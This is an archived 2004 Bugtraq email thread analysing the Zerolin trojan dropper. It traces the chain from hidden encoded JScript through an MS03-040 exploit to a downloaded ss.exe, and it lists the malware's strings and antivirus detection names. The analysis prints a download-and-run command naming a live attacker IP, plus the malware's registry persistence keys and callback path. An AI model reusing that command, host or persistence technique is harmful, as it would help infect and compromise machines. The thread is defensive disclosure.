Nicholas was kind enough to provide me with a sample of Zerolin. Anyone who is even remotely up-to-date with their patches will not be affected by this. At the end of the email is a short piece of encoded Jscript code which when decoded outputs a hidden iframe that retrieves the following URL: http://202.99.172.153/link.html Don't click the link, it is still live. Following a lot of pagebreaks is an attempt to exploit the Object Data vulnerability that was fixed by MS03-040. If successful, this launches MSHTA.EXE which executes the code provided by http://202.99.172.153/link.php which in turn outputs an embedded file to C:\x.exe after which it executes the following command: C:\x.exe http://202.99.172.153/ss.exe Here's some of the more interesting strings from that file which suggests Zerolin talks back to index.php on that same IP to notify its owner of a compromised machine: CoCreateGuid StringFromCLSID ole32.dll wsprintfA CreateWindowExA DefWindowProcA DispatchMessageA GetMessageA KillTimer LoadCursorA LoadIconA PostQuitMessage RegisterClassExA SendMessageA SetTimer SetWindowsHookExA TranslateMessage UnhookWindowsHookEx USER32.dll CloseHandle CopyFileA CreateMutexA CreateProcessA CreateThread DeleteFileA ExitProcess FreeLibrary GetCommandLineA GetCurrentProcess GetFileSize GetModuleFileNameA GetModuleHandleA GetProcAddress GetSystemDirectoryA GetTickCount GetVersionExA GlobalAlloc GlobalFree LoadLibraryA OpenMutexA ReleaseMutex Sleep TerminateProcess WaitForSingleObject WinExec _lclose _lcreat _lopen _lread _lwrite lstrcatA lstrcmpA lstrcpyA lstrlenA KERNEL32.dll InitializeAcl IsValidAcl RegCloseKey RegCreateKeyA RegOpenKeyExA RegQueryValueExA RegSetValueExA SetSecurityInfo ADVAPI32.dll WS2_32.dll %lu Timer UP Timer Down &Name= http:// /index.php?Client= close SSClass SSIcon kernel32.dll RegisterServiceProcess \dss.dll \dssa.dll dssa.dll \ss.dat \ss.dop 202.99. CLSID\ \InProcServer32 Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad 172.153 Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE Default AutoProc ss.exe \ss.exe one CallNextHookEx USER32.dll GetSystemDirectoryA WinExec lstrcatA KERNEL32.dll dss.dll AutoProc \ss.exe FindWindowA SendMessageA USER32.dll DeleteFileA GetFileSize GetSystemDirectoryA GlobalAlloc GlobalFree WinExec _lclose _lcreat _lopen _lread _lwrite lstrcatA lstrcpyA KERNEL32.dll dssa.dll AutoProc \ss.exe \ss.dat \ss.dop Regards Thor Larholm Senior Security Researcher PivX Solutions 23 Corporate Plaza #280 Newport Beach, CA 92660 http://www.pivx.com thor@xxxxxxxx Stock symbol: (PIVX.OB) Phone: +1 (949) 231-8496 PGP: 0x4207AEE9 B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9 PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. <http://www.pivx.com/qwikfix> -----Original Message----- From: T.H. Haymore [mailto:bonk@xxxxxxxxxxxxxxxxxxxxxxx] Sent: Friday, August 13, 2004 7:51 AM To: Nicolas Gregoire Cc: bugtraq@xxxxxxxxxxxxxxxxx; Mark.Amos@xxxxxxxxxxxxxxxx Subject: Re: JS/Zerolin On Fri, 13 Aug 2004, Nicolas Gregoire wrote: Nicholas, Thanks for the insight. I've received several replies telling me to look at McAfee (yadda-yadda) and other sites. I am well aware of the Zerolin VBS script as I researched it before posting. You've provided what insight I was looking for on the java script side. Mark, I think this is what we're looking for. Also, keep us updated as to what else you see as this could very well be a new version and they are indeed 'testing'. Thanks again, -th <snip> > Hi, > > I've seen theses emails since last Friday, and my gateway has since > received around 200 of them. KAV and ClamAV detect them as > "TrojanDropper.VBS.Zerolin" > > It appears that a small Jscript.Encoded code is hidden at the botton > of a false (true ?) spam. After several redirections, un ss.exe file > is downloaded. This file is detected as following : > > KAV : Trojan.Win32.Genme.c > Trend : not detected > ClamAV : Trojan.Xebiz.A > F-Prot : W32/Xebiz.A > NAI : not detected > > Regards, > -- > Nicolas Gregoire ----- Consultant en Sécurité des Systèmes > d'Information ================================================= Travis www.cyberabuse.org/crimewatch Email: Bonk@xxxxxxxxxxxxxxx | Bonk@xxxxxxxxxxxxxx ================================================= /"\ \ / X ASCII Ribbon Campaign / \ Against HTML Email
